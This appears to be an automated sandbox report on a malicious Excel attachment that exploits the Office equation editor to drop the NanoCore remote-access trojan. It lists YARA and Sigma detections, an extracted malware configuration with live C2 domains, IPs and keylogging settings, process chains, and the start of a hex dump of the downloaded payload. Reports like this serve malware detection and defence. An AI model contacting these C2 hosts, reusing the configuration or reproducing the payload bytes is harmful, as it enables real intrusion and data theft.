4.2.vbc.exe.3436de0.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x601ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x601ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x63d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3436de0.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3436de0.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x5ff15:$a: NanoCore 0x5ff25:$a: NanoCore 0x60159:$a: NanoCore 0x6016d:$a: NanoCore 0x601ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x5ff74:$b: ClientPlugin 0x60176:$b: ClientPlugin 0x601b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x6009b:$c: ProjectData 0x10a82:$d: DESCrypto 0x60aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
4.2.vbc.exe.340edc0.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x881cd:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x8820a:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8bd3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.340edc0.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.340edc0.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0x87f35:$a: NanoCore 0x87f45:$a: NanoCore 0x88179:$a: NanoCore 0x8818d:$a: NanoCore 0x881cd:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin
5.2.RegAsm.exe.2a3fd90.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x9c07:$x1: NanoCore.ClientPluginHost 0x19eb1:$x1: NanoCore.ClientPluginHost 0x2705f:$x1: NanoCore.ClientPluginHost 0x2d67d:$x1: NanoCore.ClientPluginHost 0x33690:$x1: NanoCore.ClientPluginHost 0x3d137:$x1: NanoCore.ClientPluginHost 0x475a3:$x1: NanoCore.ClientPluginHost 0x526d1:$x1: NanoCore.ClientPluginHost 0x5e4b3:$x1: NanoCore.ClientPluginHost 0x6a242:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9c31:$x2: IClientNetworkHost 0x19ede:$x2: IClientNetworkHost 0x27098:$x2: IClientNetworkHost 0x2d6b6:$x2: IClientNetworkHost 0x3d294:$x2: IClientNetworkHost 0x475dc:$x2: IClientNetworkHost 0x526eb:$x2: IClientNetworkHost 0x5e4cd:$x2: IClientNetworkHost 0x6a27f:$x2: IClientNetworkHost
5.2.RegAsm.exe.2a3fd90.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x9c07:$x2: NanoCore.ClientPluginHost 0x19eb1:$x2: NanoCore.ClientPluginHost 0x2705f:$x2: NanoCore.ClientPluginHost 0x2d67d:$x2: NanoCore.ClientPluginHost 0x33690:$x2: NanoCore.ClientPluginHost 0x3d137:$x2: NanoCore.ClientPluginHost 0x475a3:$x2: NanoCore.ClientPluginHost 0x526d1:$x2: NanoCore.ClientPluginHost 0x5e4b3:$x2: NanoCore.ClientPluginHost 0x6a242:$x2: NanoCore.ClientPluginHost 0x1ae80:$s2: FileCommand 0x1261:$s3: PipeExists 0x3e08d:$s3: PipeExists 0x1136:$s4: PipeCreated 0xbab7:$s4: PipeCreated 0x1f882:$s4: PipeCreated 0x2717c:$s4: PipeCreated 0x2d798:$s4: PipeCreated 0x3376e:$s4: PipeCreated 0x3d32d:$s4: PipeCreated
5.2.RegAsm.exe.2a3fd90.24.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x9be2:$a: NanoCore 0x9c07:$a: NanoCore 0x9c60:$a: NanoCore 0x19e8b:$a: NanoCore 0x19eb1:$a: NanoCore 0x19f0d:$a: NanoCore 0x26da7:$a: NanoCore 0x26e00:$a: NanoCore 0x26e33:$a: NanoCore 0x2705f:$a: NanoCore 0x270db:$a: NanoCore 0x276f4:$a: NanoCore 0x2783d:$a: NanoCore 0x27d11:$a: NanoCore 0x27ff8:$a: NanoCore 0x2800f:$a: NanoCore 0x2d67d:$a: NanoCore
5.2.RegAsm.exe.3b73634.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1c25c:$x1: NanoCore.ClientPluginHost 0x2222d:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x6231b:$x1: NanoCore.ClientPluginHost 0x8a57d:$x1: NanoCore.ClientPluginHost 0x999bd:$x1: NanoCore.ClientPluginHost 0xb1859:$x1: NanoCore.ClientPluginHost 0xd9aa7:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x1c295:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x62348:$x2: IClientNetworkHost
5.2.RegAsm.exe.3b73634.26.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.3b73634.26.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
5.2.RegAsm.exe.3b67402.28.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14dd7:$x1: NanoCore.ClientPluginHost 0x21f40:$x1: NanoCore.ClientPluginHost 0x2848e:$x1: NanoCore.ClientPluginHost 0x2e45f:$x1: NanoCore.ClientPluginHost 0x37ecb:$x1: NanoCore.ClientPluginHost 0x422f6:$x1: NanoCore.ClientPluginHost 0x4d2d3:$x1: NanoCore.ClientPluginHost 0x59075:$x1: NanoCore.ClientPluginHost 0x6e54d:$x1: NanoCore.ClientPluginHost 0x967af:$x1: NanoCore.ClientPluginHost 0xa5bef:$x1: NanoCore.ClientPluginHost 0xbda8b:$x1: NanoCore.ClientPluginHost 0xe5cd9:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e04:$x2: IClientNetworkHost 0x21f79:$x2: IClientNetworkHost 0x284c7:$x2: IClientNetworkHost 0x38028:$x2: IClientNetworkHost 0x4232f:$x2: IClientNetworkHost 0x4d2ed:$x2: IClientNetworkHost
5.2.RegAsm.exe.3b67402.28.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.3b67402.28.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14db1:$a: NanoCore 0x14dd7:$a: NanoCore 0x14e33:$a: NanoCore 0x21c88:$a: NanoCore 0x21ce1:$a: NanoCore 0x21d14:$a: NanoCore 0x21f40:$a: NanoCore 0x21fbc:$a: NanoCore 0x225d5:$a: NanoCore 0x2271e:$a: NanoCore 0x22bf2:$a: NanoCore 0x22ed9:$a: NanoCore 0x22ef0:$a: NanoCore 0x2848e:$a: NanoCore 0x28508:$a: NanoCore 0x2d0a5:$a: NanoCore 0x2e45f:$a: NanoCore 0x2e4a9:$a: NanoCore
5.2.RegAsm.exe.2a44ddc.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14e65:$x1: NanoCore.ClientPluginHost 0x22013:$x1: NanoCore.ClientPluginHost 0x28631:$x1: NanoCore.ClientPluginHost 0x2e644:$x1: NanoCore.ClientPluginHost 0x380eb:$x1: NanoCore.ClientPluginHost 0x42557:$x1: NanoCore.ClientPluginHost 0x4d685:$x1: NanoCore.ClientPluginHost 0x59467:$x1: NanoCore.ClientPluginHost 0x651f6:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e92:$x2: IClientNetworkHost 0x2204c:$x2: IClientNetworkHost 0x2866a:$x2: IClientNetworkHost 0x38248:$x2: IClientNetworkHost 0x42590:$x2: IClientNetworkHost 0x4d69f:$x2: IClientNetworkHost 0x59481:$x2: IClientNetworkHost 0x65233:$x2: IClientNetworkHost
5.2.RegAsm.exe.2a44ddc.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x14e65:$x2: NanoCore.ClientPluginHost 0x22013:$x2: NanoCore.ClientPluginHost 0x28631:$x2: NanoCore.ClientPluginHost 0x2e644:$x2: NanoCore.ClientPluginHost 0x380eb:$x2: NanoCore.ClientPluginHost 0x42557:$x2: NanoCore.ClientPluginHost 0x4d685:$x2: NanoCore.ClientPluginHost 0x59467:$x2: NanoCore.ClientPluginHost 0x651f6:$x2: NanoCore.ClientPluginHost 0x15e34:$s2: FileCommand 0x39041:$s3: PipeExists 0x6a6b:$s4: PipeCreated 0x1a836:$s4: PipeCreated 0x22130:$s4: PipeCreated 0x2874c:$s4: PipeCreated 0x2e722:$s4: PipeCreated 0x382e1:$s4: PipeCreated 0x426a2:$s4: PipeCreated 0x4e6ba:$s4: PipeCreated 0x5b212:$s4: PipeCreated
5.2.RegAsm.exe.2a44ddc.25.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14e3f:$a: NanoCore 0x14e65:$a: NanoCore 0x14ec1:$a: NanoCore 0x21d5b:$a: NanoCore 0x21db4:$a: NanoCore 0x21de7:$a: NanoCore 0x22013:$a: NanoCore 0x2208f:$a: NanoCore 0x226a8:$a: NanoCore 0x227f1:$a: NanoCore 0x22cc5:$a: NanoCore 0x22fac:$a: NanoCore 0x22fc3:$a: NanoCore 0x28631:$a: NanoCore 0x286ab:$a: NanoCore 0x2e644:$a: NanoCore 0x2e68e:$a: NanoCore 0x2f2e8:$a: NanoCore
5.2.RegAsm.exe.3b625d6.27.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x99e7:$x1: NanoCore.ClientPluginHost 0x19c03:$x1: NanoCore.ClientPluginHost 0x26d6c:$x1: NanoCore.ClientPluginHost 0x2d2ba:$x1: NanoCore.ClientPluginHost 0x3328b:$x1: NanoCore.ClientPluginHost 0x3ccf7:$x1: NanoCore.ClientPluginHost 0x47122:$x1: NanoCore.ClientPluginHost 0x520ff:$x1: NanoCore.ClientPluginHost 0x5dea1:$x1: NanoCore.ClientPluginHost 0x73379:$x1: NanoCore.ClientPluginHost 0x9b5db:$x1: NanoCore.ClientPluginHost 0xaaa1b:$x1: NanoCore.ClientPluginHost 0xc28b7:$x1: NanoCore.ClientPluginHost 0xeab05:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9a11:$x2: IClientNetworkHost 0x19c30:$x2: IClientNetworkHost 0x26da5:$x2: IClientNetworkHost 0x2d2f3:$x2: IClientNetworkHost 0x3ce54:$x2: IClientNetworkHost
5.2.RegAsm.exe.3b625d6.27.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.3b625d6.27.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99c2:$a: NanoCore 0x99e7:$a: NanoCore 0x9a40:$a: NanoCore 0x19bdd:$a: NanoCore 0x19c03:$a: NanoCore 0x19c5f:$a: NanoCore 0x26ab4:$a: NanoCore 0x26b0d:$a: NanoCore 0x26b40:$a: NanoCore 0x26d6c:$a: NanoCore 0x26de8:$a: NanoCore 0x27401:$a: NanoCore 0x2754a:$a: NanoCore 0x27a1e:$a: NanoCore 0x27d05:$a: NanoCore 0x27d1c:$a: NanoCore 0x2d2ba:$a: NanoCore
Click to see the 120 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.127.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Sigma detected: Suspicious Process Start Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.vbc.exe.3486e00.5.raw.unpack

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for domain / URL

Show sources

Source: wekeepworking.sytes.net	Virustotal: Detection: 7%			Perma Link
Source: wekeepworking.sytes.net	Virustotal: Detection: 7%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Virustotal: Detection: 39%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\win33.exe	ReversingLabs: Detection: 30%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 30%

Multi AV Scanner detection for submitted file

Show sources

Source: Ref 0180066743.xlsx

ReversingLabs: Detection: 21%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\win33.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Joe Sandbox ML: detected

Source: 5.2.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.0.RegAsm.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.0.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.RegAsm.exe.de0000.14.unpack	Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
Source:	Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
Source:	Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp

Source: excel.exe

Memory has grown: Private usage: 4MB later: 79MB

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 004309C0h	4_2_004301DD
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	4_2_00437685
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	4_2_00437730
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_04A0D6E0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_0035E942

Source: global traffic

DNS query: name: wekeepworking.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: wekeepworking.sytes.net
Source: Malware configuration extractor	URLs: wekeepworking12.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 79.134.225.90:1144

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 06:04:57 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 08 Jun 2021 22:22:11 GMTETag: "b3400-5c44896d8ef42"Accept-Ranges: bytesContent-Length: 734208Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 